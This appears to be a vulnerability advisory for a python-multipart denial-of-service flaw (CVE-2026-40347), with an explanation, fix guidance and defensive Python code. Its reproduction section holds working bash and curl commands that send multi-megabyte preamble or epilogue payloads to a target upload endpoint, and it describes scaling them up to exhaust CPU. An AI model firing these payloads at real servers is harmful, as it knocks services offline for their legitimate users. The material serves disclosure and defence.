python-multipart, Denial of Service (DoS), CVE-2026-40347 (Moderate)


How CVE-2026-40347 Works

The vulnerability exists in python-multipart, a streaming multipart parser for Python used in many web frameworks to handle `multipart/form-data` requests. Two inefficient parsing paths can be triggered by an attacker with control over the request body.
– Inefficient preamble parsing: Before the first multipart boundary, the parser inefficiently processes leading CR and LF bytes while searching for the start of the first part. The parser attempts to find the boundary by scanning byte-by-byte, but when faced with a large preamble containing no boundary, it continues processing all those bytes without making progress toward finding the first part.
– Inefficient epilogue parsing: After the closing boundary, the parser continues processing trailing epilogue data instead of discarding it immediately. The RFC specification states that epilogue data should be ignored, but the vulnerable parser does not discard it; instead, it keeps iterating through the entire epilogue.
Because the parser runs synchronously on the main thread or worker process, the time spent parsing scales linearly with the size of the crafted preamble or epilogue data. An attacker can send a single HTTP request with a megabyte-sized preamble or epilogue, causing the parser to spend CPU cycles processing every byte. Under concurrent attack traffic, this can degrade request-handling capacity, increase latency, and lead to service degradation for legitimate users.
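The two behaviours the fix introduces (jumping straight to the first boundary rather than stepping through the preamble, and ignoring everything after the closing boundary) are easiest to see in a small buffer-based splitter. The following is an added illustration, not python-multipart's own streaming code; it assumes a fully buffered body with CRLF-delimited parts, and `build_sample` constructs a sample request body with whatever preamble and epilogue sizes you want to try.

```python
# Added illustrative example (not python-multipart's own code): a buffer-based
# multipart splitter whose preamble and epilogue handling cost one find() and
# zero reads respectively, regardless of how large those regions are.
from __future__ import annotations


def split_multipart(body: bytes, boundary: bytes) -> list[tuple[bytes, bytes]]:
    """Return [(raw_headers, content), ...] for each part of a multipart body.

    Assumes the whole body is in memory and parts are CRLF-delimited.
    """
    delim = b"--" + boundary
    # Preamble: a single find() locates the first delimiter. The bytes before
    # it are never inspected individually, so a huge preamble costs one scan.
    pos = body.find(delim)
    if pos == -1:
        raise ValueError("opening boundary not found")

    parts: list[tuple[bytes, bytes]] = []
    while True:
        after = pos + len(delim)
        if body.startswith(b"--", after):
            # Closing delimiter: everything that follows is epilogue and is
            # discarded without being read, so its size is irrelevant.
            return parts
        # Skip the rest of the delimiter line (optional padding, then CRLF).
        line_end = body.find(b"\r\n", after)
        if line_end == -1:
            raise ValueError("malformed delimiter line")
        part_start = line_end + 2
        # A part runs until the next CRLF-prefixed delimiter.
        nxt = body.find(b"\r\n" + delim, part_start)
        if nxt == -1:
            raise ValueError("unterminated part")
        part = body[part_start:nxt]
        if part.startswith(b"\r\n"):
            headers, content = b"", part[2:]
        else:
            sep = part.find(b"\r\n\r\n")
            if sep == -1:
                headers, content = part, b""
            else:
                headers, content = part[:sep], part[sep + 4:]
        parts.append((headers, content))
        pos = nxt + 2


def build_sample(preamble: bytes, epilogue: bytes, boundary: bytes = b"boundary") -> bytes:
    """Constructed request body: arbitrary preamble, one form field, arbitrary epilogue."""
    return (
        preamble
        + b"--" + boundary + b"\r\n"
        + b'Content-Disposition: form-data; name="field"\r\n\r\n'
        + b"value\r\n"
        + b"--" + boundary + b"--\r\n"
        + epilogue
    )


if __name__ == "__main__":
    body = build_sample(b"\r\n" * 1_000_000, b"A" * 1_000_000)
    print(split_multipart(body, b"boundary"))
```

A streaming parser cannot buffer the whole body like this, but the same principle applies chunk by chunk: search for the next delimiter candidate with a substring search and never revisit bytes already ruled out, and stop consuming input once the closing delimiter has been seen.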

DailyCVE Form

Platform: `python-multipart`
Version: `<0.0.26`
Vulnerability: `DoS (parsing)`
Severity: `MODERATE`
Date: `2026-04-15`

Prediction: `2026-04-10`

What Undercode Say:

To reproduce the issue, send a multipart request with a large preamble:

```bash
# Generate 10MB of preamble data
dd if=/dev/zero bs=1M count=10 | base64 > preamble.txt

# Create multipart request with large preamble (printf rather than echo -n,
# so the \r\n escapes become real CRLF bytes under every shell)
{
  cat preamble.txt          # streamed, not expanded into a command argument
  printf '%s\r\n' '--boundary'
  printf 'Content-Disposition: form-data; name="field"\r\n\r\n'
  printf 'value\r\n'
  printf '%s\r\n' '--boundary--'
} > request.bin

# Send to vulnerable endpoint
curl -X POST http://target/upload -H "Content-Type: multipart/form-data; boundary=boundary" --data-binary @request.bin
```

Alternatively, use a large epilogue:

```bash
# Create multipart request with a large epilogue after the closing boundary
{
  printf '%s\r\n' '--boundary'
  printf 'Content-Disposition: form-data; name="field"\r\n\r\n'
  printf 'value\r\n'
  printf '%s\r\n' '--boundary--'
  dd if=/dev/zero bs=1M count=10 | base64   # 10MB of epilogue data
} > request_epilogue.bin
```

Exploit:

An attacker can craft a single HTTP request with a multipart body where the preamble or epilogue is arbitrarily large (e.g., 100 MB). The parser will iterate over every byte of that data, consuming CPU proportionally to the size of the injected data. Since web servers typically limit request size (e.g., 100 MB), the attacker can maximize the CPU impact within that limit. Under high concurrency, multiple such requests can exhaust CPU cores, causing request queuing, timeouts, and service disruption.

Protection from this CVE:

  • Immediate upgrade: Upgrade `python-multipart` to version 0.0.26 or later. The fix implements two improvements: (1) when processing leading CR/LF data, the parser skips ahead to the next boundary candidate instead of scanning inefficiently; (2) epilogue data after the closing boundary is immediately discarded without further processing.
  • Workaround (if upgrade not possible): Configure your web application to reject requests with excessively large `Content-Length` for multipart endpoints, or implement a timeout for request parsing to kill long-running parsing operations.
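The Content-Length workaround can be enforced in front of the parser with a thin ASGI layer, so oversized multipart bodies are refused before a single byte reaches python-multipart. The code below is an added example, not part of python-multipart or any framework; the 10 MB limit is an assumed value, `MultipartSizeGuard` is a hypothetical name, and `simulate` runs a constructed request through the guard without a real server. One caveat worth building in: a request with no usable `Content-Length` (for example chunked transfer encoding) has no declared size to check, so the guard answers 411 rather than letting the parser find out the hard way.

```python
# Added example (not python-multipart's or any framework's own code): pure-ASGI
# middleware that refuses multipart uploads whose declared size exceeds a limit.
from __future__ import annotations

import asyncio
from typing import Optional

MAX_MULTIPART_BYTES = 10 * 1024 * 1024  # assumed limit; tune per endpoint


def _header(scope: dict, name: bytes) -> Optional[bytes]:
    """Return the first matching header value from an ASGI scope, or None."""
    for key, value in scope.get("headers", []):
        if key.lower() == name:
            return value
    return None


def reject_status(scope: dict, max_bytes: int = MAX_MULTIPART_BYTES) -> Optional[int]:
    """Decide whether to refuse a request before its body is read.

    Returns an HTTP status to answer with, or None to let the request through.
    Only multipart/form-data bodies are checked; everything else passes.
    """
    content_type = (_header(scope, b"content-type") or b"").lower()
    if not content_type.startswith(b"multipart/form-data"):
        return None
    length = _header(scope, b"content-length")
    if length is None or not length.isdigit():
        # No usable Content-Length (e.g. chunked): the size cannot be bounded
        # up front, so refuse with 411 Length Required.
        return 411
    if int(length) > max_bytes:
        return 413  # Payload Too Large
    return None


class MultipartSizeGuard:
    """Wrap any ASGI app: app = MultipartSizeGuard(app, max_bytes=...)."""

    def __init__(self, app, max_bytes: int = MAX_MULTIPART_BYTES):
        self.app = app
        self.max_bytes = max_bytes

    async def __call__(self, scope, receive, send):
        if scope["type"] == "http":
            status = reject_status(scope, self.max_bytes)
            if status is not None:
                await send({"type": "http.response.start", "status": status,
                            "headers": [(b"content-type", b"text/plain")]})
                await send({"type": "http.response.body",
                            "body": b"multipart body rejected\n"})
                return
        await self.app(scope, receive, send)


async def _ok_app(scope, receive, send):
    """Stand-in downstream app that always answers 200."""
    await send({"type": "http.response.start", "status": 200, "headers": []})
    await send({"type": "http.response.body", "body": b"ok\n"})


def simulate(headers: list[tuple[bytes, bytes]], max_bytes: int = MAX_MULTIPART_BYTES) -> int:
    """Run one constructed request through the guarded app; return the status sent."""
    scope = {"type": "http", "method": "POST", "path": "/upload", "headers": headers}
    sent: list[dict] = []

    async def receive():
        return {"type": "http.request", "body": b"", "more_body": False}

    async def send(message):
        sent.append(message)

    asyncio.run(MultipartSizeGuard(_ok_app, max_bytes)(scope, receive, send))
    return sent[0]["status"]


if __name__ == "__main__":
    print(simulate([(b"content-type", b"multipart/form-data; boundary=b"),
                    (b"content-length", b"104857600")]))  # 100 MB declared -> 413
```

Content-Length is a declared value, so this check only works when the server honours it and stops reading at that many bytes, which the common ASGI servers do. Pair it with a reverse-proxy body limit for defence in depth, and treat the upgrade to 0.0.26 as the real fix.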

Impact:

  • Availability degradation: An attacker can cause high CPU consumption during request parsing, reducing the server’s capacity to handle legitimate requests and increasing response latency.
  • Service disruption: Under sustained attack, worker processes may become blocked, leading to request queuing, timeouts, and potential cascading failures in the application.
  • Limited scope: The issue degrades availability but does not typically result in a complete denial of service for the entire application. No memory corruption, privilege escalation, or data leakage is involved.
  • Attack vector: Remote exploitation over the network with low complexity, no authentication required, and no user interaction.


Sources:

Reported By: github.com